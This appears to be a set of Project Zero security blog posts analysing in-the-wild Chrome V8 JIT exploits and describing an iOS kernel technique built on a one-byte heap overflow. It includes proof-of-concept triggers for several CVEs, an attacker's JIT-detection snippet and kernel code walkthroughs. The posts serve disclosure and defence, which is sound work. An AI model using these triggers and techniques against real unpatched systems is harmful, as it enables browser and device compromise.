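These coercions can be checked from any JavaScript engine:

// Verifying the three cases above from regular JavaScript:
console.log(Object.is(-0 + 0, +0));  // true: adding zero drops the minus sign
console.log(typeof ("30" - 0));      // "number": subtraction coerces a string
console.log(typeof ({} + 0));        // "string": the object is stringified first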

As a result, the patched function provides us with an even wider choice of possible “type confusions”.

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.
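As an illustration, here is a minimal sketch of that priming step; the warm-up iteration count is illustrative and depends on the V8 version:

// A sketch of the described priming: the early out-of-bounds access is
// recorded in the type feedback, so TurboFan later guards the access with a
// NumberLessThan comparison instead of a hardened CheckBounds node.
function read(array, index) {
  return array[index];
}
var arr = [1.1, 2.2, 3.3, 4.4];
read(arr, 100);                     // deliberate OOB attempt while interpreted
for (var i = 0; i < 100000; i++) {  // warm up until TurboFan compiles read()
  read(arr, 0);
}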

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {
  // Initially:
  // actual = 1, inferred = any
  var k = 0;

  arg = arg | 0;
  // After step one:
  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

  arg = Math.min(arg, 2);
  // After step two:
  // actual = 1, inferred = [-0x80000000, 2]

  arg = Math.max(arg, 1);
  // After step three:
  // actual = 1, inferred = [1, 2]

  if (arg == 1) {
    arg = "30";
  }
  // After step four:
  // actual = string{30}, inferred = [1, 2] or string{30}

  for (var i = arg; i < 0x1000; i -= 0) {
    if (++k > 1) {
      break;
    }
  }
  // After step five:
  // actual = number{30}, inferred = [1, 2] or string{30}

  i += 1;
  // After step six:
  // actual = 31, inferred = [2, 3]

  i >>= 1;
  // After step seven:
  // actual = 15, inferred = 1

  i += 2;
  // After step eight:
  // actual = 17, inferred = 3

  i >>= 1;
  // After step nine:
  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];
  return [array[i], array];
}

The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.

Conclusion

This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in a class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.

...more

In-the-Wild Series: Chrome Exploits

Published: 2021-01-12 17:36:00

Popularity: 9

Author: Ryan

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

Introduction

As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need for a separate issue to, for example, break ASLR. Second, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];

function trigger(local_array) {
  var temp = global_array[0];
  local_array[1] = {};
  return global_array[1];
}

trigger([, {}]);
trigger([, 1.1]);

for (var i = 0; i < 10000; i++) {
  trigger([, {}]);
}

print(trigger(global_array));

The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made the alias analyzer use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {
  [...]
     // Constant objects can be distinguished statically.
-    if (a->IsConstant()) {
+    if (a->IsConstant() && b->IsConstant()) {
       return a->Equals(b) ? kMustAlias : kNoAlias;
     }
     return kMayAlias;

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar; however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and is only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';
(function() {
  var popped;

  function trigger(new_target) {
    function inner(new_target) {
      function constructor() {
        popped = Array.prototype.pop.call(array);
      }
      var temp = array[0];
      return Reflect.construct(constructor, arguments, new_target);
    }

    inner(new_target);
  }

  var array = new Array(0, 0, 0, 0, 0);

  for (var i = 0; i < 20000; i++) {
    trigger(function() { });
    array.push(0);
  }

  var proxy = new Proxy(Object, {
    get: () => (array[4] = 1.1, Object.prototype)
  });

  trigger(proxy);
  print(popped);
}());

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable, meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t just call pop on the array directly because, for the expression array.pop(), the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
[...]
  InferReceiverMapsResult result = kReliableReceiverMaps;
[...]
    case IrOpcode::kJSCreate: {
      if (IsSame(receiver, effect)) {
        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
        if (initial_map.has_value()) {
          *maps_return = ZoneHandleSet<Map>(initial_map->object());
          return result;
        }
        // We reached the allocation of the {receiver}.
        return kNoReceiverMaps;
      }
+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
      break;
    }
[...]

The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive” garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.
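The slicing behavior itself is observable from ordinary JavaScript; the attack merely corrupts the recorded indices that drive it (this snippet is illustrative, not exploit code):

// toString() on a class constructor re-extracts the body from the stored
// script source using the recorded start/end positions; with corrupted
// positions, the same slicing operation returns out-of-bounds heap data.
class Demo { constructor() { /* marker */ } }
console.log(Demo.toString());  // prints the class source, sliced verbatim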

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

jit_detector[Symbol.toPrimitive] = function() {
  var stack = (new Error).stack;
  if (stack.indexOf("Number (") == -1) {
    jit_detector.is_compiled = true;
  }
};

function trigger(array, proxy) {
  if (!jit_detector.is_compiled) {
    Number(jit_detector);
  }
[...]

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:

function trigger(new_target) {
  function inner(new_target) {
    popped = array.pop(
        Reflect.construct(function() { }, arguments, new_target));
  }

  inner(new_target);
}

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

oob_index = 100000;

function trigger() {
  let array = [1.1, 1.1];

  let index = arguments.length;
  index = index - 65534;
  index = Math.max(index, 0);

  return array[index] = 2.2;
}

for (let i = 0; i < 20000; i++) {
  trigger(1,2,3);
}

print(trigger.apply(null, new Array(65534 + oob_index)));

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and the BCE technique, which has been commonly known since at least 2017. The public exploit turns the out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.

Conclusion

The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor twice switched from an already high-quality 0-day to a slightly better vulnerability.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2014, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

...more

One Byte to rule them all

Published: 2020-07-30 16:17:00

Popularity: 121

Author: Unknown

Posted by Brandon Azad, Project Zero

One Byte to rule them all, One Byte to type them,
One Byte to map them all, and in userspace bind them
-- Comment above vm_map_copy_t

For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level raises questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.

I - The Fellowship of the Wiring

A struct of power

While looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:

struct vm_map_copy {
        int                     type;
#define VM_MAP_COPY_ENTRY_LIST          1
#define VM_MAP_COPY_OBJECT              2
#define VM_MAP_COPY_KERNEL_BUFFER       3
        vm_object_offset_t      offset;
        vm_map_size_t           size;
        union {
                struct vm_map_header    hdr;      /* ENTRY_LIST */
                vm_object_t             object;   /* OBJECT */
                uint8_t                 kdata[0]; /* KERNEL_BUFFER */
        } c_u;
};

This looked interesting to me for several reasons:

  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values (see the short demonstration after this list).
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.
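The little-endian point in item 1 can be demonstrated with a few lines of C; the constants mirror the vm_map_copy type values, but this is a standalone illustration rather than exploit code:

#include <stdio.h>
#include <string.h>

int main(void) {
    int type = 3;                     /* VM_MAP_COPY_KERNEL_BUFFER */
    unsigned char overflow_byte = 1;  /* VM_MAP_COPY_ENTRY_LIST */
    /* A one-byte linear overflow only reaches the first byte of the field,
     * which on a little-endian machine is the least significant byte. */
    memcpy(&type, &overflow_byte, 1);
    printf("type = %d\n", type);      /* prints "type = 1" on little-endian */
    return 0;
}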

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.

Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.

A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.

Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.



Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.



As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.



With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiver's process.
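For readers unfamiliar with this interface, here is a minimal sketch of the sending side; it uses only the standard Mach message API, with error handling and the receive side omitted:

#include <mach/mach.h>
#include <string.h>

/* Queue out-of-line memory on a Mach port; the kernel packages the buffer as
 * a vm_map_copy, and vm_map_copyout_internal() runs when it is received. */
kern_return_t send_ool_memory(mach_port_t holding_port, void *data, size_t size)
{
    struct {
        mach_msg_header_t header;
        mach_msg_body_t body;
        mach_msg_ool_descriptor_t ool;
    } msg;
    memset(&msg, 0, sizeof(msg));
    msg.header.msgh_bits =
        MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
    msg.header.msgh_remote_port = holding_port;
    msg.header.msgh_size = sizeof(msg);
    msg.body.msgh_descriptor_count = 1;
    msg.ool.type = MACH_MSG_OOL_DESCRIPTOR;
    msg.ool.address = data;                /* e.g. a fake vm_map_header */
    msg.ool.size = (mach_msg_size_t)size;
    msg.ool.copy = MACH_MSG_VIRTUAL_COPY;  /* stored as a vm_map_copy */
    msg.ool.deallocate = FALSE;
    return mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0,
                    MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}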

As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:

kern_return_t
vm_map_copyout_internal(
    vm_map_t                dst_map,
    vm_map_address_t        *dst_addr,      /* OUT */
    vm_map_copy_t           copy,
    vm_map_size_t           copy_size,
    boolean_t               consume_on_success,
    vm_prot_t               cur_protection,
    vm_prot_t               max_protection,
    vm_inherit_t            inheritance)
{
...
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
...
    vm_map_lock(dst_map);
...
    adjustment = start - vm_copy_start;
...
    /*
     *    Adjust the addresses in the copy chain, and
     *    reset the region attributes.
     */
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
...
        entry->vme_start += adjustment;
        entry->vme_end += adjustment;
...
        /*
         * If the entry is now wired,
         * map the pages into the destination map.
         */
        if (entry->wired_count != 0) {
...
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
...
                m = vm_page_lookup(object, offset);
...
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
...
                offset += PAGE_SIZE_64;
                va += PAGE_SIZE;
           }
       }
   }
...
        vm_map_copy_insert(dst_map, last, copy);
...
    vm_map_unlock(dst_map);
...
}

Let's walk through this step-by-step. First, other vm_map_copy types are handled:

    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }

The vm_map is locked:

    vm_map_lock(dst_map);

We enter a for loop over the linked list of (fake) vm_map_entry objects:

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:

        if (entry->wired_count != 0) {

When set, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:

            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {

We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:

                m = vm_page_lookup(object, offset);

And finally, we call vm_fault_enter() to fault in the page:

                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);

The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:

kern_return_t
pmap_enter_options(
        pmap_t pmap,
        vm_map_address_t v,
        ppnum_t pn,
        vm_prot_t prot,
        vm_prot_t fault_type,
        unsigned int flags,
        boolean_t wired,
        unsigned int options,
        __unused void   *arg)

pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.

